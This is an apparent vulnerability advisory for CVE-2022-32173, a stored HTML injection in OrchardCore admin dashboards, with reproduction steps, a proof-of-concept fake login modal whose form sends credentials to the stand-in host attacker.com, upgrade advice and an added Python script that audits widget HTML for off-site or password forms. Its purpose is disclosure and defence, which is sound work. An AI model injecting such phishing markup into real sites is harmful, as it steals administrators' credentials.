CVE-2022-32173: Mend Vulnerability Database


Overview

OrchardCore versions rc1-11259 through v1.2.2 are vulnerable to HTML injection, which allows an authenticated user with an editor security role to inject a persistent HTML modal dialog component into the dashboard that will affect admin users.

Details

Once an admin accesses the dashboard, the injected modal dialog is presented (preventing access to any other element on the page) and waits for input. Once the form is submitted, the admin is redirected to a malicious host and the attacker receives the confidential data (the user’s credentials, for instance).

PoC Details

1. Log in as an admin, navigate to security roles, and then edit the “Editor” role.
2. Enable the “Manage the Admin Dashboard” privilege.
3. Create a user with the “Editor” role and log out.
4. Log in as the new user.
5. Once logged in, navigate to the Admin page (“/Admin” route).
6. Click “Manage Dashboard” and edit a widget that has HTML editing capabilities.
7. Click “<>” and add the HTML code from the PoC Code section.
8. Click “Publish”.
You will see that you are brought to the “/Admin” page and cannot click any other element. Type in non-confidential data and click “Login”. You will see that you are redirected to the attacker’s site, and the credentials are sent to the attacker.
9. Now log in as an admin (since you can’t log out, go to the “/login” route).
10. Navigate to the Admin page (“/Admin” route). You will see the modal dialog appear.

PoC Code

<div class="modal show d-block">
  <div class="modal-dialog">
    <div class="modal-content">
      <div class="modal-header">
        <h3 class="page-title">Please Log In</h3>
      </div>
      <div class="modal-body">
        <form class="new-wiki-page" action="http://attacker.com/">
          <div class="form-group">
            <label for="username"><span>Username</span></label>
            <input type="text" name="username" id="username" class="form-control">
            <label for="password"><span>Password</span></label>
            <input type="password" name="password" id="password" class="form-control">
          </div>
          <div class="form-actions"><button name="button" type="submit" class="btn btn-success">Login</button></div>
        </form>
      </div>
    </div>
  </div>
</div>

Affected Environments

OrchardCore versions rc1-11259 through v1.2.2

Prevention

Upgrade to OrchardCore version v1.4.0
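
Upgrading does not remove markup that was already stored in a dashboard widget. The following is an added example, not code from the advisory or from OrchardCore: a Python audit that parses a widget's stored HTML and reports forms that submit to a host outside the site or that collect a password. The host names, the sample widget bodies and the function names are assumptions made for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormAuditor(HTMLParser):
    """Collects <form> elements that post off-site or ask for a password."""
    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted = {h.lower() for h in trusted_hosts}
        self.current = None  # form currently being parsed, if any
        self.findings = []

    def _off_site(self, url):
        # Relative URLs have no hostname and stay on the CMS origin.
        host = (urlparse(url or "").hostname or "").lower()
        return bool(host) and host not in self.trusted

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.current = {"action": a.get("action"), "password": False,
                            "off_site": self._off_site(a.get("action"))}
        elif self.current is not None and tag in ("input", "button"):
            if (a.get("type") or "").lower() == "password":
                self.current["password"] = True
            if self._off_site(a.get("formaction")):  # overrides form action
                self.current["off_site"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self.current is not None:
            if self.current["off_site"] or self.current["password"]:
                self.findings.append(self.current)
            self.current = None

def audit_widget_html(html, trusted_hosts):
    parser = FormAuditor(trusted_hosts)
    parser.feed(html)
    parser.close()
    parser.handle_endtag("form")  # flush a form that was never closed
    return parser.findings

# Constructed sample widget bodies; "cms.example" is a placeholder site host.
SAMPLES = {
    "search": '<form action="/search"><input type="text" name="q"></form>',
    "modal": '<div class="modal show d-block"><form action="http://attacker.example/">'
             '<input type="password" name="password"><button>Login</button></form></div>',
}

for name, html in SAMPLES.items():
    print(name, audit_widget_html(html, {"cms.example"}))
```

A legitimate same-site password form is also listed, so each finding is a prompt to review who last edited that widget rather than proof of injection.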

Related news

GHSA-5gg9-gwj4-mqmj: OrchardCore vulnerable to HTML injection

OrchardCore versions starting with 1.0.0-rc1-11259 and prior to 1.4.0 are vulnerable to HTML injection. The vulnerability allows an authenticated user with an editor security role to inject a persistent HTML modal dialog component into the dashboard that will affect admin users. Version 1.4.0 contains a patch.
